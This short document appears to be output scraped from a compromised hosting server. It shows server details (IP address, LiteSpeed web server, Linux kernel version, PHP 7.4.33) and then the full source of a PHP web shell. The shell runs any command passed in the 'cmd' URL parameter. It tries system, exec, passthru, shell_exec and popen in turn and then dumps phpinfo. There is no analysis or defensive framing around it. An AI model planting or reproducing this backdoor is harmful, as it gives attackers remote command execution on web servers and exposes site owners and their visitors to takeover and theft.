Server Address : 2a02:4780:a:760:0:37cc:13e2:3
Web Server : LiteSpeed
Uname : Linux uk-fast-web660.main-hosting.eu 5.14.0-570.55.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Oct 21 05:27:51 EDT 2025 x86_64
PHP Version : 7.4.33
<?php
echo "SHELL_WORKS\n";
if(isset($_GET['cmd'])) {
echo "CMD: " . $_GET['cmd'] . "\n";
if(function_exists('system')) {
system($_GET['cmd']);
} elseif(function_exists('exec')) {
echo exec($_GET['cmd']);
} elseif(function_exists('passthru')) {
passthru($_GET['cmd']);
} elseif(function_exists('shell_exec')) {
echo shell_exec($_GET['cmd']);
} elseif(function_exists('popen')) {
$f = popen($_GET['cmd'], 'r');
while(!feof($f)) echo fread($f, 4096);
pclose($f);
} else {
echo "NO EXEC FUNCTIONS AVAILABLE\n";
}
}
phpinfo();